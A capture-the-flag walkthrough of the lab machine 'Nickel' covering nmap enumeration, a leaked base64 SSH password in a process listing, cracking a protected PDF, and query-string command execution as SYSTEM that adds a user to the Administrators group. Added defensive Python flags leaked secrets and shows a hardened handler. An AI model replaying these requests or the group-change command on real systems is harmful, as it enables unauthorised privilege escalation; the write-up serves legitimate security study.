A very simple machine in which leaked credentials are obtained from a file of an exposed web service. Those credentials are then used to log in via SSH and retrieve a PDF containing interesting information that points to a web service running with administrator privileges, through which commands can be executed.
The steps are listed in more detail:
Service enumeration, which turns up a web service with an endpoint that shows information about the credentials of the user ariah.
SSH access and retrieval of a password-protected PDF file from the FTP service folder.
Cracking the PDF file and recovering its password with the rockyou.txt wordlist.
Finding information in the file about an endpoint that allows command execution as nt authority\system.
Adding ariah to the Administrators group, and PWNED!
Enumeration
nmap scan
Basic enumeration of all services over TCP, UDP and SCTP:
The second scan (nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP) gives us the following information:
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 8684fdd5432705cfa7f2e9e27570d5f3 (RSA)
| 256 9c93cf48a94e70f460dee1a9c2c0b6ff (ECDSA)
|_ 256 004ed73b0f9fe3744d04990bb18bdea5 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-02-19T12:21:38+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: NICKEL
| NetBIOS_Domain_Name: NICKEL
| NetBIOS_Computer_Name: NICKEL
| DNS_Domain_Name: nickel
| DNS_Computer_Name: nickel
| Product_Version: 10.0.18362
|_ System_Time: 2023-02-19T12:19:27+00:00
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2023-02-18T12:02:35
|_Not valid after: 2023-08-20T12:02:35
8089/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.223.99
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.223.99:8089/
| Form id:
| Form action: http://169.254.109.39:33333/list-current-deployments
|
| Path: http://192.168.223.99:8089/
| Form id:
| Form action: http://169.254.109.39:33333/list-running-procs
|
| Path: http://192.168.223.99:8089/
| Form id:
|_ Form action: http://169.254.109.39:33333/list-active-nodes
|_http-title: Site doesn't have a title.
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
33333/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: UNKNOWN (unable to test)
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../etc/passwd :
| <p>Not Implemented</p>
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_ http://www.exploit-db.com/exploits/1244/
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb-vuln-ms10-054: false
|_smb2-time: ERROR: Script execution failed (use -d to debug)
|_samba-vuln-cve-2012-1182: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
Scan analysis
Several URLs and open services are found; after a basic enumeration of each of them, one endpoint stands out as interesting.
http://169.254.109.39:33333/list-running-procs
Modifying the request so that it points at the victim machine's IP and is sent with the HTTP POST method instead of GET, we obtain the following:
POST /list-running-procs HTTP/1.1
Host: 192.168.155.99:33333
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0
name : System Idle Process
commandline :
name : System
commandline :
name : Registry
commandline :
name : smss.exe
commandline :
name : csrss.exe
commandline :
name : wininit.exe
commandline :
name : csrss.exe
commandline :
name : winlogon.exe
commandline : winlogon.exe
name : services.exe
commandline :
name : lsass.exe
commandline : C:\Windows\system32\lsass.exe
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : dwm.exe
commandline : "dwm.exe"
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1
name : Memory Compression
commandline :
name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1
name : spoolsv.exe
commandline : C:\Windows\System32\spoolsv.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"
name : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"
name : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
name : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
name : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa392c855 /state1:0x41c64e6d
name : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : SgrmBroker.exe
commandline :
name : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding
name : WmiApSrv.exe
commandline : C:\Windows\system32\wbem\WmiApSrv.exe
name : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe -maintenance
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
Among that information we obtain a username and a password which, judging by its characteristics, is base64-encoded.
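As an added example that is not part of the original writeup, here is a small Python parser for the "name : / commandline :" layout returned by list-running-procs. It flags the two things a defender should catch in that listing: a secret passed on a process command line (decoding it when it is base64) and a PowerShell host started with its execution policy bypassed. The sample input is constructed from a few of the entries shown above; the flag list is an assumption.

```python
import base64
import re
# Constructed sample in the "name : / commandline :" layout of list-running-procs.
SAMPLE = r"""
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1
name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
name : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"
"""
SECRET_FLAGS = {"-p", "-pass", "-pw", "--password"}   # assumed flags whose next token is a secret
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

def parse_procs(text):
    """Turn the endpoint's alternating name/commandline lines into dicts."""
    procs, current = [], None
    for line in text.splitlines():
        key, _, value = line.partition(":")      # the key itself never contains ':'
        key, value = key.strip(), value.strip()
        if key == "name":
            current = {"name": value, "commandline": ""}
            procs.append(current)
        elif key == "commandline" and current is not None:
            current["commandline"] = value
    return procs

def decode_if_base64(token):
    """Return the decoded text if token is base64 of printable ASCII, else None."""
    if not B64_TOKEN.match(token):
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("ascii").strip()
    except ValueError:                           # bad alphabet/padding or non-ASCII bytes
        return None
    return text if text and text.isprintable() else None

def find_exposures(text):
    """Return (process, finding, value) triples for risky command lines."""
    findings = []
    for proc in parse_procs(text):
        tokens = proc["commandline"].split()
        for i, tok in enumerate(tokens[:-1]):    # only tokens that have a successor
            nxt = tokens[i + 1].strip('"')
            if tok.lower() in SECRET_FLAGS:      # report the secret, decoded if base64
                findings.append((proc["name"], "secret on command line", decode_if_base64(nxt) or nxt))
            elif tok.lower() in ("-ep", "-executionpolicy") and nxt.lower() == "bypass":
                findings.append((proc["name"], "execution policy bypass", nxt))
    return findings
```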
Once valid credentials for the server have been obtained, we try them against the available services, including SSH and FTP:
When we try to open the file we see that it is password-protected, so we run a dictionary attack with pdfcrack using the rockyou.txt wordlist:
The "Temporary Command" endpoint looks like it may allow command execution; let's see whether we are lucky and the service happens to be running as Administrator.
From the SSH session, curl is run against the endpoint with the whoami command:
curl http://localhost/?whoami
The following response is returned:
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24
<pre>nt authority\system
</pre>
</body></html>
We run the following to switch to PowerShell:
ariah@NICKEL C:\>powershell.exe
The request is sent and the response body is retrieved:
PS C:\Users\Administrator> $response = Invoke-WebRequest 'http://localhost/?net%20localgroup%20Administrators%20ariah%20%2Fadd' -UseBasicParsing
PS C:\Users\Administrator> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 136
Date: Sun, 26 Feb 2023 21:19:54 GMT
Last-Modified: Sun, 26 Feb 2023 13:19:54 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24
<pre>The command completed successfully.
</pre>
</body></html>
We verify that the user has been added to the Administrators group:
PS C:\Users\Administrator> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
ariah
The command completed successfully.
And now the flag, which is on the Administrator's desktop, can be read:
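The root cause on this box is a listener running as SYSTEM that executes whatever arrives in its query string. As an added example that is not the page's or the dev-api's own code, the Python below puts that pattern next to a hardened handler that URL-decodes the query once, bounds its length, accepts only an exact allow-list match and runs the mapped argv without a shell; the allow-list entries and the resolve_command/handle names are assumptions.

```python
import subprocess
from urllib.parse import unquote_plus

# Hypothetical allow-list for the dev-api: the whole decoded query must equal a
# key, and the value is the argv vector that gets run (no shell involved).
ALLOWED = {
    "whoami": ["whoami"],
    "list-running-procs": ["tasklist", "/v"],
}
MAX_QUERY_LEN = 64


def vulnerable_shell_line(raw_query):
    """The pattern behind the SYSTEM endpoint above: the decoded query becomes
    the command line verbatim, so a group-membership change rides along as-is."""
    return unquote_plus(raw_query)              # this string would go to a shell


def resolve_command(raw_query):
    """Hardened lookup: decode once, bound the length, then require an exact
    allow-list match. Returns a fresh argv list or raises ValueError."""
    query = unquote_plus(raw_query).strip()
    if not query or len(query) > MAX_QUERY_LEN:
        raise ValueError("empty or oversized query")
    if query not in ALLOWED:                    # anything with spaces, ';', '&' etc. fails here
        raise ValueError(f"command not allowed: {query!r}")
    return list(ALLOWED[query])


def handle(raw_query):
    """HTTP-style entry point returning (status, body): 400 for rejected
    queries; an allowed argv runs with shell=False and a timeout."""
    try:
        argv = resolve_command(raw_query)
    except ValueError as exc:
        return 400, str(exc)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10, check=False)
    return 200, result.stdout
```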